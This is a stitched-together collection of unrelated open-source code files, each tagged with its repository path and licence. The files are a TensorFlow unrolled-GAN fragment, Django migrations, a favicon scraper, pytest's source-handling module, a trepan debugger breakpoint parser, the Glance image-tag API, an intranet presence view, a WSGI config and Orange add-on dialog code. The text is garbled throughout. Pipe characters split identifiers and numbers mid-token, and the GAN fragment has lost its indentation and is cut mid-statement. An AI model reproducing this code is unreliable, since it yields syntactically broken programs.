z = tf.random_uniform(shape=([FLAGS.z_dim]), minval=-1, maxval=1, name='z')
label_true = tf.random_uniform(shape=([]), minval=0.7, maxval=1.2, name='label_t')
label_false = tf.random_uniform(shape=([]), minval=0, maxval=0.3, name='label_f')
sampler_z = tf.random_uniform(shape=([FLAGS.batch_size, FLAGS.z_dim]), minval=-1, maxval=1, name='sampler_z')
[image, z, label_true, label_false] = tf.train.batch([image, z, label_true, label_false], batch_size=FLAGS.batch_size, capacity=2*FLAGS.batch_size)
generator_result = dcgan_generator(z, 'Generator', reuse=False, output_height=28, fc1_c=1024, grayscale=True)
sampler_result = dcgan_generator(sampler_z, 'Generator', reuse=True, output_height=28, fc1_c=1024, grayscale=True)
discriminator_g, g_logits = dcgan_discriminator(generator_result, 'Discriminator', reuse=False, conv2d1_c=128, grayscale=True)
discriminator_d, d_logits = dcgan_discriminator(image, 'Discriminator', reuse=True, conv2d1_c=128, grayscale=True)
d_loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=label_false, logits=g_logits) + \
tf.losses.sigmoid_cross_entropy(multi_class_labels=label_true, logits=d_logits)
standard_g_loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=label_true, logits=g_logits)
if FLAGS.optimizer == 'Adam':
g_optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate,
beta1=FLAGS.beta1,
beta2=FLAGS.beta2,
epsilon=FLAGS.epsilon,
name='g_adam')
d_optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate,
beta1=FLAGS.beta1,
beta2=FLAGS.beta2,
epsilon=FLAGS.epsilon,
name='d_adam')
#unrolled_optimizer = Adam(lr=FLAGS.learning_rate,
# beta_1=FLAGS.beta1,
# beta_2=FLAGS.beta2,
# epsilon=FLAGS.epsilon)
elif FLAGS.optimizer == 'SGD':
g_optimizer = tf.train.GradientDescentOptimizer(learning_rate=FLAGS.learning_rate,
name='g_sgd')
d_optimizer = tf.train.GradientDescentOptimizer(learning_rate=FLAGS.learning_rate,
name='d_sgd')
var_g = slim.get_variables(scope='Generator', collection=tf.GraphKeys.TRAINABLE_VARIABLES)
var_d = slim.get_variables(scope='Discriminator', collection=tf.GraphKeys.TRAINABLE_VARIABLES)
#update_ops = unrolled_optimizer.get_updates(var_d, [], d_loss)
#update_map = extract_update_dict(update_ops)
#current_update_map = update_map
#pp.pprint(current_update_map)
current_update_map = OrderedDict()
for i in xrange(FLAGS.unrolled_step):
grads_d = list(zip(tf.gradients(standard_g_loss, var_d), var_d))
update_map = OrderedDict()
for g, v in grads_d:
update_map[v.value()] = v + g * FLAGS.learning_rate
current_update_map = graph_replace(update_map, update_map)
pp.pprint(current_update_map)
if FLAGS.unrolled_step != 0:
unrolled_loss = graph_replace(standard_g_loss, current_update_map)
g_loss = unrolled_loss
else:
g_loss = standard_g_loss
generator_global_step = slim.variable("generator_global_step",
shape=[],
dtype=tf.int64,
initializer=tf.zeros_initializer,
trainable=False)
discriminator_global_step = slim.variable("discriminator_global_step",
shape=[],
dtype=tf.int64,
initializer=tf.zeros_initializer,
trainable=False)
global_step = slim.get_or_create_global_step()
with tf.name_scope('train_step'):
train_step_kwargs = {}
train_step_kwargs['g'] = generator_global_step
train_step_kwargs['d'] = discriminator_global_step
if FLAGS.max_step:
train_step_kwargs['should_stop'] = tf.greater_equal(global_step, FLAGS.max_step)
else:
train_step_kwargs['should_stop'] = tf.constant(False)
train_step_kwargs['should_log'] = tf.equal(tf.mod(global_step, FLAGS.log_every_n_steps), 0)
train_op_d = slim.learning.create_train_op(d_loss, d_optimizer, variables_to_train=var_d, global_step=discriminator_global_step)
train_op_g = slim.learning.create_train_op(g_loss, g_optimizer, variables_to_train=var_g, global_step=generator_global_step)
train_op_s = tf.assign_add(global_step |
alirizakeles/tendenci | tendenci/apps/base/migrations/0002_auto_20150804_1545.py | Python | gpl-3.0 | 342 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(mig | rations.Migration):
dependencies = [
('base', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
| name='checklistitem',
options={},
),
]
|
tony/django-docutils | django_docutils/favicon/scrape.py | Python | mit | 2,207 | 0 | #!/usr/bin/env python
import logging
import sys
from urllib.parse import urljoin
import requests
from lxml import html
from six.moves.urllib.parse import urlparse
from django_docutils.exc import BasedException
logger = logging.getLogger(__name__)
def _request_favicon(url):
    """Download a favicon from *url* and validate that it is an image.

    Raises on HTTP errors, raises BasedException when the response is not
    an image, and returns the raw image bytes otherwise.
    """
    response = requests.get(url)
    response.raise_for_status()
    if 'image' not in response.headers['Content-Type']:
        raise BasedException('Not an image')
    return response.content
def get_favicon(url):
    """Return favicon bytes for *url*.

    Strategy 1 looks for <link rel="shortcut icon"/"icon"> tags in the
    page; strategy 2 falls back to <site root>/favicon.ico. Raises
    BasedException when the site is unreachable or both strategies fail.
    """
    try:
        r = requests.get(url)
        r.raise_for_status()
        # update url if redirected, so relative favicon links resolve
        if r.url != url:
            url = r.url
        doc = html.fromstring(r.content)
    except requests.exceptions.ConnectionError as e:
        raise BasedException(f"The website {url} isn't connecting:", e)

    paths = ['//link[@rel="shortcut icon"]/@href', '//link[@rel="icon"]/@href']
    for path in paths:
        # Method 1: to find favicon via "shortcut icon"
        favicons = doc.xpath(path)
        if len(favicons):  # Is pattern found?
            try:
                favicon_url = favicons[0]
                favicon_url = urljoin(url, favicon_url)
                return _request_favicon(favicon_url)
            except Exception as e:
                # Best effort: log and fall through to the next strategy.
                logger.debug(
                    'Could not retrieve {favicon_url}: \n{e}'.format(
                        favicon_url=favicon_url, e=e
                    )
                )
    # Method 2: site root/favicon.ico
    try:
        parsed = urlparse(url)
        parsed = parsed._replace(path='/favicon.ico')
        favicon_url = parsed.geturl()
        return _request_favicon(favicon_url)
    except Exception as e:
        logger.debug(
            'Could not retrieve {favicon_url}.\n{e}'.format(
                favicon_url=favicon_url, e=e
            )
        )
    raise BasedException(
        """
    Could not retrieve favicon for {url}. Both strategies failed
    """.format(
            url=url
        )
    )
if __name__ == '__main__':
    # Demo: fetch the favicon for the URL given on the command line.
    favicon = get_favicon(sys.argv[1])
    # 'with' ensures the handle is closed even if the write fails.
    with open('/Users/me/favicon.ico', 'wb') as file_:
        file_.write(favicon)
|
tareqalayan/pytest | _pytest/_code/source.py | Python | mit | 14,033 | 0.000356 | from __future__ import absolute_import, division, generators, print_function
import ast
from ast import PyCF_ONLY_AST as _AST_FLAG
from bisect import bisect_right
import linecache
import sys
import six
import inspect
import tokenize
import py
cpy_compile = compile
class Source(object):
""" a immutable object holding a source code fragment,
possibly deindenting it.
"""
_compilecounter = 0
def __init__(self, *parts, **kwargs):
self.lines = lines = []
de = kwargs.get('deindent', True)
rstrip = kwargs.get('rstrip', True)
for part in parts:
if not part:
partlines = []
if isinstance(part, Source):
partlines = part.lines
elif isinstance(part, (tuple, list)):
partlines = [x.rstrip("\n") for x in part]
elif isinstance(part, six.string_types):
partlines = part.split('\n')
if rstrip:
while partlines:
if partlines[-1].strip():
break
partlines.pop()
else:
partlines = getsource(part, deindent=de).lines
if de:
partlines = deindent(partlines)
lines.extend(partlines)
def __eq__(self, other):
try:
return self.lines == other.lines
except AttributeError:
if isinstance(other, str):
return str(self) == other
return False
__hash__ = None
def __getitem__(self, key):
if isinstance(key, int):
return self.lines[key]
else:
if key.step not in (None, 1):
raise IndexError("cannot slice a Source with a step")
newsource = Source()
newsource.lines = self.lines[key.start:key.stop]
return newsource
def __len__(self):
return len(self.lines)
def strip(self):
""" return new source object with trailing
and leading blank lines removed.
"""
start, end = 0, len(self)
while start < end and not self.lines[start].strip():
start += 1
while end > start and not self.lines[end - 1].strip():
end -= 1
source = Source()
source.lines[:] = self.lines[start:end]
return source
def putaround(self, before='', after='', indent=' ' * 4):
""" return a copy of the source object with
'before' and 'after' wrapped around it.
"""
before = Source(before)
after = Source(after)
newsource = Source()
lines = [(indent + line) for line in self.lines]
newsource.lines = before.lines + lines + after.lines
return newsource
def indent(self, indent=' ' * 4):
""" return a copy of the source object with
all lines indented by the given indent-string.
"""
newsource = Source()
newsource.lines = [(indent + line) for line in self.lines]
return newsource
def getstatement(self, lineno, assertion=False):
""" return Source statement which contains the
given linenumber (counted from 0).
"""
start, end = self.getstatementrange(lineno, assertion)
return self[start:end]
def getstatementrange(self, lineno, assertion=False):
""" return (start, end) tuple which spans the minimal
statement region which containing the given lineno.
"""
if not (0 <= lineno < len(self)):
raise IndexError("lineno out of range")
ast, start, end = getstatementrange_ast(lineno, self)
return start, end
def deindent(self, offset=None):
""" return a new source object deindented by offset.
If offset is None then guess an indentation offset from
the first non-blank line. Subsequent lines which have a
lower indentation offset will be copied verbatim as
they are assumed to be part of multilines.
"""
# XXX maybe use the tokenizer to properly handle multiline
# strings etc.pp?
newsource = Source()
newsource.lines[:] = deindent(self.lines, offset)
return newsource
def isparseable(self, deindent=True):
""" return True if source is parseable, heuristically
deindenting it by default.
"""
try:
import parser
except ImportError:
def syntax_checker(x):
return compile(x, 'asd', 'exec')
else:
syntax_checker = parser.suite
if deindent:
source = str(self.deindent())
else:
source = str(self)
try:
# compile(source+'\n', "x", "exec")
syntax_checker(source + '\n')
except KeyboardInterrupt:
raise
except Exception:
return False
else:
return True
def __str__(self):
return "\n".join(self.lines)
def compile(self, filename=None, mode='exec',
flag=generators.compiler_flag,
dont_inherit=0, _genframe=None):
""" return compiled code obj | ect. if filename is None
invent an artificial filename which displays
the source/line position of the caller frame.
"""
if not filename or py.path.local(filename).check(file=0):
if _genframe is None:
_genframe = sys._ge | tframe(1) # the caller
fn, lineno = _genframe.f_code.co_filename, _genframe.f_lineno
base = "<%d-codegen " % self._compilecounter
self.__class__._compilecounter += 1
if not filename:
filename = base + '%s:%d>' % (fn, lineno)
else:
filename = base + '%r %s:%d>' % (filename, fn, lineno)
source = "\n".join(self.lines) + '\n'
try:
co = cpy_compile(source, filename, mode, flag)
except SyntaxError:
ex = sys.exc_info()[1]
# re-represent syntax errors from parsing python strings
msglines = self.lines[:ex.lineno]
if ex.offset:
msglines.append(" " * ex.offset + '^')
msglines.append("(code was compiled probably from here: %s)" % filename)
newex = SyntaxError('\n'.join(msglines))
newex.offset = ex.offset
newex.lineno = ex.lineno
newex.text = ex.text
raise newex
else:
if flag & _AST_FLAG:
return co
lines = [(x + "\n") for x in self.lines]
linecache.cache[filename] = (1, None, lines, filename)
return co
#
# public API shortcut functions
#
def compile_(source, filename=None, mode='exec', flags=generators.compiler_flag, dont_inherit=0):
    """ compile the given source to a raw code object,
    and maintain an internal cache which allows later
    retrieval of the source code for the code object
    and any recursively created code objects.
    """
    if isinstance(source, ast.AST):
        # XXX should Source support having AST?
        return cpy_compile(source, filename, mode, flags, dont_inherit)
    caller_frame = sys._getframe(1)  # the caller
    return Source(source).compile(filename, mode, flags, _genframe=caller_frame)
def getfslineno(obj):
    """ Return source location (path, lineno) for the given object.
    If the source cannot be determined return ("", -1)
    """
    # Imported lazily to avoid an import cycle with _pytest._code.
    import _pytest._code
    try:
        code = _pytest._code.Code(obj)
    except TypeError:
        # Not something Code() understands; fall back to inspect.
        try:
            fn = inspect.getsourcefile(obj) or inspect.getfile(obj)
        except TypeError:
            return "", -1
        # py2-style conditional: None when no filename was found.
        fspath = fn and py.path.local(fn) or None
        lineno = -1
        if fspath:
            try:
                _, lineno = findsource(obj)
            except IOError:
                # Source file unreadable: keep lineno at -1.
                pass
    else:
        fspath = code.path
        lineno = code.firstlineno
    assert isinstance(lineno, int)
    return fspath, lineno
|
mcallaghan/tmv | BasicBrowser/scoping/migrations/0295_doc_tslug.py | Python | gpl-3.0 | 369 | 0 | # Generated by Django 2.2 on 2019-06-20 09:39
from django.db import migrations, models
class Migration( | migr | ations.Migration):
dependencies = [
('scoping', '0294_titlevecmodel'),
]
operations = [
migrations.AddField(
model_name='doc',
name='tslug',
field=models.TextField(null=True),
),
]
|
rocky/python2-trepan | trepan/processor/cmdbreak.py | Python | gpl-3.0 | 5,057 | 0.002571 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2009, 2010, 2015, 2017-2018 Rocky Bernstein
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import inspect
import pyficache
from trepan import misc as Mmisc
from trepan.processor.parse.semantics import build_bp_expr
from trepan.processor.parse.parser import LocationError
from trepan.processor.parse.scanner import ScannerError
from trepan.processor.location import resolve_location
def set_break(cmd_obj, func, filename, lineno, condition, temporary,
              args, force=False):
    """Create a breakpoint and report the outcome via cmd_obj messages.

    Returns True when a breakpoint was added, False on any validation
    failure (unparseable line number, line not stoppable without force).
    """
    if lineno is None:
        part1 = ("I don't understand '%s' as a line number, function name,"
                 % ' '.join(args[1:]))
        msg = Mmisc.wrapped_lines(part1, "or file/module plus line number.",
                                  cmd_obj.settings['width'])
        cmd_obj.errmsg(msg)
        return False
    if filename is None:
        # Default to the file of the frame currently being debugged.
        filename = cmd_obj.proc.curframe.f_code.co_filename
        filename = cmd_obj.core.canonic(filename)
        pass
    if func is None:
        # Line breakpoint: verify the line can actually be stopped at.
        ok_linenos = pyficache.trace_line_numbers(filename)
        if not ok_linenos or lineno not in ok_linenos:
            part1 = ('File %s' % cmd_obj.core.filename(filename))
            msg = Mmisc.wrapped_lines(part1,
                                      "is not stoppable at line %d." %
                                      lineno, cmd_obj.settings['width'])
            cmd_obj.errmsg(msg)
            if force:
                cmd_obj.msg("Breakpoint set although it may never be reached")
            else:
                return False
        pass
    bp = cmd_obj.core.bpmgr.add_breakpoint(filename, lineno, temporary,
                                           condition, func)
    # func_name is the Python 2 spelling of __name__ for functions.
    if func and inspect.isfunction(func):
        cmd_obj.msg('Breakpoint %d set on calling function %s()'
                    % (bp.number, func.func_name))
        part1 = 'Currently this is line %d of file' % lineno
        msg = Mmisc.wrapped_lines(part1, cmd_obj.core.filename(filename),
                                  cmd_obj.settings['width'])
    else:
        part1 = ( 'Breakpoint %d set at line %d of file'
                 % (bp.number, lineno))
        msg = Mmisc.wrapped_lines(part1, cmd_obj.core.filename(filename),
                                  cmd_obj.settings['width'])
        pass
    cmd_obj.msg(msg)
    return True
# Sentinel tuple returned for any unparseable break command.
INVALID_PARSE_BREAK = (None, None, None, None)


def parse_break_cmd(proc, args):
    """Parse a 'break' command into (func, filename, lineno, condition).

    Returns INVALID_PARSE_BREAK on any parse error, after reporting the
    error via proc.errmsg().
    """
    if proc.current_command is None:
        proc.errmsg("Internal error")
        return INVALID_PARSE_BREAK
    # Everything after the command word itself.
    text = proc.current_command[len(args[0])+1:]
    if len(args) > 1 and args[1] == 'if':
        # "break if <cond>": break at the current location.
        location = '.'
        condition = text[text.find('if ')+3:]
    elif text == '':
        location = '.'
        condition = None
    else:
        try:
            bp_expr = build_bp_expr(text)
        except LocationError as e:
            proc.errmsg("Error in parsing breakpoint expression at or around:")
            proc.errmsg(e.text)
            proc.errmsg(e.text_cursor)
            return INVALID_PARSE_BREAK
        except ScannerError as e:
            proc.errmsg("Lexical error in parsing breakpoint expression at or around:")
            proc.errmsg(e.text)
            proc.errmsg(e.text_cursor)
            return INVALID_PARSE_BREAK
        location = bp_expr.location
        condition = bp_expr.condition
    location = resolve_location(proc, location)
    if location:
        return location.method, location.path, location.line_number, condition
    else:
        return INVALID_PARSE_BREAK
# Demo it: run this module directly to exercise parse_break_cmd against a
# mock debugger and print the parsed tuples.
if __name__=='__main__':
    from trepan.processor.command import mock as Mmock
    from trepan.processor.cmdproc import CommandProcessor
    import sys
    d = Mmock.MockDebugger()
    cmdproc = CommandProcessor(d.core)
    # print '-' * 10
    # print_source_line(sys.stdout.write, 100, 'source_line_test.py')
    # print '-' * 10
    cmdproc.frame = sys._getframe()
    cmdproc.setup()
    # Sample commands; most are kept commented out for manual testing.
    for cmd in (
            # "break '''c:\\tmp\\foo.bat''':1",
            # 'break """/Users/My Documents/foo.py""":2',
            # "break",
            # "break 10",
            # "break if True",
            # "break cmdproc.py:5",
            # "break set_break()",
            "break 4 if i == 5",
            # "break cmdproc.setup()",
    ):
        args = cmd.split(' ')
        cmdproc.current_command = cmd
        print(parse_break_cmd(cmdproc, args))
        pass
mozilla/mozilla-ignite | apps/badges/tests/view_tests.py | Python | bsd-3-clause | 1,703 | 0 | from badges.models import SubmissionBadge
from badges.tests.base_tests import BadgesBaseTest
from django.core.urlresolvers import reverse
from timeslot.tests.fixtures import create_user, create_submission
class BadgesSubmissionTest(BadgesBaseTest):
    """Tests for badge visibility on the submission detail page."""

    def setUp(self):
        # Ignite fixtures are setup on the BadgesBaseTest
        super(BadgesSubmissionTest, self).setUp()
        self.badge_a = self.create_badge()
        self.badge_b = self.create_badge(body='Award')
        self.user = create_user('bob')
        self.submission = create_submission('Hello', self.user, self.ideation)

    def test_submission_badges(self):
        """Test the badges awarded in the Submission page"""
        data = {
            'submission': self.submission,
            'badge': self.badge_a
        }
        entry = SubmissionBadge.objects.create(**data)
        self.assertTrue(entry.is_published)
        url = reverse('entry_show', kwargs={'entry_id': self.submission.id,
                                            'phase': 'ideas'})
        response = self.client.get(url)
        self.assertEqual(len(response.context['badge_list']), 1)

    def test_hidden_submission_badges(self):
        """Test the hidden badges are not shown on the Submission page"""
        data = {
            'submission': self.submission,
            'badge': self.badge_a,
            'is_published': False,
        }
        SubmissionBadge.objects.create(**data)
        url = reverse('entry_show', kwargs={'entry_id': self.submission.id,
                                            'phase': 'ideas'})
        response = self.client.get(url)
        self.assertEqual(len(response.context['badge_list']), 0)
klmitch/glance | glance/api/v2/image_tags.py | Python | apache-2.0 | 4,348 | 0 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific la | nguage governing | permissions and limitations
# under the License.
import glance_store
from oslo_log import log as logging
from oslo_utils import encodeutils
import webob.exc
from glance.api import policy
from glance.api.v2 import images as v2_api
from glance.common import exception
from glance.common import utils
from glance.common import wsgi
import glance.db
import glance.gateway
from glance.i18n import _
import glance.notifier
LOG = logging.getLogger(__name__)
class Controller(object):
    """v2 API controller for adding/removing tags on an image.

    Translates domain-layer exceptions into the corresponding webob HTTP
    errors, logging each via LOG.warning.
    """
    def __init__(self, db_api=None, policy_enforcer=None, notifier=None,
                 store_api=None):
        # Each collaborator falls back to its module default when not
        # injected (tests inject fakes through these parameters).
        self.db_api = db_api or glance.db.get_api()
        self.policy = policy_enforcer or policy.Enforcer()
        self.notifier = notifier or glance.notifier.Notifier()
        self.store_api = store_api or glance_store
        self.gateway = glance.gateway.Gateway(self.db_api, self.store_api,
                                              self.notifier, self.policy)
    @utils.mutating
    def update(self, req, image_id, tag_value):
        """Add *tag_value* to the image's tag set (idempotent for dupes)."""
        image_repo = self.gateway.get_repo(req.context)
        try:
            image = image_repo.get(image_id)
            image.tags.add(tag_value)
            image_repo.save(image)
        except exception.NotFound:
            msg = _("Image %s not found.") % image_id
            LOG.warning(msg)
            raise webob.exc.HTTPNotFound(explanation=msg)
        except exception.Forbidden:
            msg = _("Not allowed to update tags for image %s.") % image_id
            LOG.warning(msg)
            raise webob.exc.HTTPForbidden(explanation=msg)
        except exception.Invalid as e:
            msg = (_("Could not update image: %s")
                   % encodeutils.exception_to_unicode(e))
            LOG.warning(msg)
            raise webob.exc.HTTPBadRequest(explanation=msg)
        except exception.ImageTagLimitExceeded as e:
            msg = (_("Image tag limit exceeded for image %(id)s: %(e)s:")
                   % {"id": image_id,
                      "e": encodeutils.exception_to_unicode(e)})
            LOG.warning(msg)
            raise webob.exc.HTTPRequestEntityTooLarge(explanation=msg)
    @utils.mutating
    def delete(self, req, image_id, tag_value):
        """Remove *tag_value* from the image; 404 when the tag is absent."""
        image_repo = self.gateway.get_repo(req.context)
        try:
            image = image_repo.get(image_id)
            if tag_value not in image.tags:
                # Missing tag is reported the same way as a missing image.
                raise webob.exc.HTTPNotFound()
            image.tags.remove(tag_value)
            image_repo.save(image)
        except exception.NotFound:
            msg = _("Image %s not found.") % image_id
            LOG.warning(msg)
            raise webob.exc.HTTPNotFound(explanation=msg)
        except exception.Forbidden:
            msg = _("Not allowed to delete tags for image %s.") % image_id
            LOG.warning(msg)
            raise webob.exc.HTTPForbidden(explanation=msg)
class ResponseSerializer(wsgi.JSONResponseSerializer):
    """Serialize tag mutation results; both operations reply 204 No Content."""
    def update(self, response, result):
        # Tag added; no response body.
        response.status_int = 204
    def delete(self, response, result):
        # Tag removed; no response body.
        response.status_int = 204
class RequestDeserializer(wsgi.JSONRequestDeserializer):
    """Validate tag-update requests against the v2 image schema."""
    def update(self, request):
        # Validate the tag from the URL as a one-element "tags" list on
        # the image schema; a schema violation becomes 400 Bad Request.
        try:
            schema = v2_api.get_schema()
            schema_format = {"tags": [request.urlvars.get('tag_value')]}
            schema.validate(schema_format)
        except exception.InvalidObject as e:
            raise webob.exc.HTTPBadRequest(explanation=e.msg)
        return super(RequestDeserializer, self).default(request)
def create_resource():
    """Images resource factory method"""
    # Wire the tags controller to its JSON (de)serializers in one expression;
    # argument order is (controller, deserializer, serializer).
    return wsgi.Resource(Controller(), RequestDeserializer(), ResponseSerializer())
|
stxnext/intranet-open | src/intranet3/intranet3/views/presence.py | Python | mit | 3,777 | 0.002648 | # -*- coding: utf-8 -*-
import datetime
from babel.core import Locale
from sqlalchemy import func
from pyramid.view import view_config
from intranet3.utils.views import BaseView
from intranet3.models import User, PresenceEntry, Late, Absence, DBSession
from intranet3 import helpers | as h
from intranet3.utils import excuses
# Bounds used to clamp presence queries to a single calendar day.
day_start = datetime.time(0, 0, 0)
day_end = datetime.time(23, 59, 59)  # was garbled as "23, 5 | 9, 59"
# Arrivals after 09:00 are flagged as late in the presence list view.
hour_9 = datetime.time(9, 0, 0)
locale = Locale('en', 'US')
@view_config(route_name='presence_list', permission='can_view_presence')
class List(BaseView):
    """Per-location daily overview of presences, lates and absences."""
    def get(self):
        # Optional ?date=dd.mm.yyyy; defaults to today.
        date = self.request.GET.get('date')
        if date:
            date = datetime.datetime.strptime(date, '%d.%m.%Y')
        else:
            date = datetime.date.today()
        start_date = datetime.datetime.combine(date, day_start)
        end_date = datetime.datetime.combine(date, day_end)
        def get_entries(city):
            # First/last presence timestamp per user for the day; users
            # with no location set (None) are included for every city.
            return DBSession.query(User.id, User.name, func.min(PresenceEntry.ts), func.max(PresenceEntry.ts))\
                .filter(User.id == PresenceEntry.user_id)\
                .filter((User.location == city) | (User.location == None))\
                .filter(PresenceEntry.ts >= start_date)\
                .filter(PresenceEntry.ts <= end_date)\
                .group_by(User.id, User.name)\
                .order_by(User.name)
        def get_lates(city):
            # Users with a registered "late" window for the day.
            return DBSession.query(User.id, User.name, Late.late_start, Late.late_end)\
                .filter(User.id == Late.user_id)\
                .filter(User.location == city)\
                .filter(Late.date == date)\
                .order_by(User.name)
        def get_absence(city):
            # Users whose absence date range covers the requested day.
            return DBSession.query(User.id, User.name)\
                .filter(User.id == Absence.user_id)\
                .filter(User.location == city)\
                .filter(Absence.date_start <= date)\
                .filter(Absence.date_end >= date)\
                .order_by(User.name)
        locations = []
        for name, (fullname, shortcut) in self.request.user.get_locations():
            presences = dict(
                shortcut=shortcut,
                name=fullname,
                # Fifth tuple element flags arrival after 09:00 as late.
                entries=((user_id, user_name, start, stop, start.time() > hour_9) for (user_id, user_name, start, stop) in get_entries(name)),
                late=get_lates(name),
                absence=get_absence(name),
            )
            locations.append(presences)
        return dict(
            date=date,
            prev_date=h.previous_day(date),
            next_date=h.next_day(date),
            excuses=excuses.presence(),
            justification=excuses.presence_status(date, self.request.user.id),
            locations=locations,
        )
@view_config(route_name='presence_full', permission='can_view_presence')
class Full(BaseView):
    """Chronological listing of every presence entry for a single day."""
    def get(self):
        # Optional ?date=dd.mm.yyyy; defaults to today.
        date = self.request.GET.get('date')
        if date:
            date = datetime.datetime.strptime(date, '%d.%m.%Y')
        else:
            date = datetime.date.today()
        start_date = datetime.datetime.combine(date, day_start)
        end_date = datetime.datetime.combine(date, day_end)
        # All (user, entry) pairs for the day, oldest first.
        entries = DBSession.query(User, PresenceEntry)\
            .filter(PresenceEntry.user_id==User.id)\
            .filter(PresenceEntry.ts>=start_date)\
            .filter(PresenceEntry.ts<=end_date)\
            .order_by(PresenceEntry.ts)
        return dict(
            entries=entries,
            date=date,
            prev_date=h.previous_day(date), next_date=h.next_day(date)
        )
|
Alem/django-jfu | demo/demo/wsgi.py | Python | bsd-3-clause | 1,208 | 0.011589 | """
WSGI config for demo project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
import site
# Point Django at the demo settings module before anything imports settings.
# (Fixed garbled assignment and SITE_ROOT reference from the original.)
os.environ['DJANGO_SETTINGS_MODULE'] = 'demo.settings'
SITE_ROOT = os.path.dirname(os.path.dirname(__file__))
# Make the bundled virtualenv's site-packages importable.
site.addsitedir(SITE_ROOT + '/venv/local/lib/python2.7/site-packages')
sys.path.append(SITE_ROOT)
# Windows virtualenvs use "scripts/", POSIX ones use "bin/".
exc_dir = 'scripts' if os.name == 'nt' else 'bin'
venv = '%s/venv/%s/activate_this.py' % (SITE_ROOT, exc_dir)
activate_env = os.path.expanduser(venv)
# Python 2 idiom: activate the virtualenv inside this interpreter.
execfile(activate_env, dict(__file__=activate_env))
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
|
marinkaz/orange3 | Orange/canvas/application/addons.py | Python | bsd-2-clause | 26,262 | 0.00019 | import sys
import sysconfig
import os
import re
import errno
import shlex
import shutil
import subprocess
import itertools
import concurrent.futures
from site import USER_SITE
from glob import iglob
from collections import namedtuple, deque
from xml.sax.saxutils import escape
from distutils import version
import pkg_resources
try:
import docutils.core
except ImportError:
docutils = None
from PyQt4.QtGui import (
QWidget, QDialog, QLabel, QLineEdit, QTreeView, QHeaderView,
QTextBrowser, QTextOption, QDialogButtonBox, QProgressDialog,
QVBoxLayout, QPalette, QStandardItemModel, QStandardItem,
QSortFilterProxyModel, QItemSelectionModel, QStyle, QStyledItemDelegate,
QStyleOptionViewItemV4, QApplication, QHBoxLayout
)
from PyQt4.QtCore import (
Qt, QObject, QMetaObject, QEvent, QSize, QTimer, QThread, Q_ARG
)
from PyQt4.QtCore import pyqtSignal as Signal, pyqtSlot as Slot
from ..gui.utils import message_warning, message_information, \
message_critical as message_error
from ..help.manager import get_dist_meta, trim
# Add-ons maintained by the Orange team.
OFFICIAL_ADDONS = [
    "Orange-Bioinformatics",
    "Orange3-DataFusion",
    "Orange3-Prototypes",
    "Orange3-Text",
    "Orange3-Network",
    "Orange3-Associate",
]

# A package release as advertised by the index (PyPI-style metadata).
Installable = namedtuple(
    "Installable",
    ["name", "version", "summary", "description", "package_url",
     "release_urls"]
)

# One downloadable artifact belonging to a release.
ReleaseUrl = namedtuple(
    "ReleaseUrl",
    ["filename", "url", "size", "python_version", "package_type"]
)

# An add-on known from the index but not installed locally.
Available = namedtuple("Available", ["installable"])

# An installed add-on: index metadata (may be None) plus the local dist.
Installed = namedtuple("Installed", ["installable", "local"])
def is_updatable(item):
    """Return True when *item* is an Installed add-on with a newer release.

    Tries StrictVersion first; falls back to LooseVersion when either
    version string is not strictly formatted.
    """
    if isinstance(item, Available):  # fixed garbled name "Avai | lable"
        # Not installed at all, so there is nothing to update.
        return False
    elif item.installable is None:
        # Installed but unknown to the index: no candidate version.
        return False
    else:
        inst, dist = item
        try:
            v1 = version.StrictVersion(dist.version)
            v2 = version.StrictVersion(inst.version)
        except ValueError:
            # Non-strict version strings; fall through to LooseVersion.
            pass
        else:
            return v1 < v2
    return (version.LooseVersion(dist.version) <
            version.LooseVersion(inst.version))
class TristateCheckItemDelegate(QStyledItemDelegate):
    """
    A QStyledItemDelegate which properly toggles Qt.ItemIsTristate check
    state transitions on user interaction.
    """
    # NOTE: base-class name was garbled ("QS | tyledItemDelegate") and is
    # restored here.
    def editorEvent(self, event, model, option, index):
        flags = model.flags(index)
        if not flags & Qt.ItemIsUserCheckable or \
                not option.state & QStyle.State_Enabled or \
                not flags & Qt.ItemIsEnabled:
            return False
        checkstate = model.data(index, Qt.CheckStateRole)
        if checkstate is None:
            return False
        widget = option.widget
        style = widget.style() if widget else QApplication.style()
        if event.type() in {QEvent.MouseButtonPress, QEvent.MouseButtonRelease,
                            QEvent.MouseButtonDblClick}:
            pos = event.pos()
            opt = QStyleOptionViewItemV4(option)
            self.initStyleOption(opt, index)
            rect = style.subElementRect(
                QStyle.SE_ItemViewItemCheckIndicator, opt, widget)
            # Only a left click inside the check indicator toggles state.
            if event.button() != Qt.LeftButton or not rect.contains(pos):
                return False
            if event.type() in {QEvent.MouseButtonPress,
                                QEvent.MouseButtonDblClick}:
                return True
        elif event.type() == QEvent.KeyPress:
            if event.key() != Qt.Key_Space and event.key() != Qt.Key_Select:
                return False
        else:
            return False
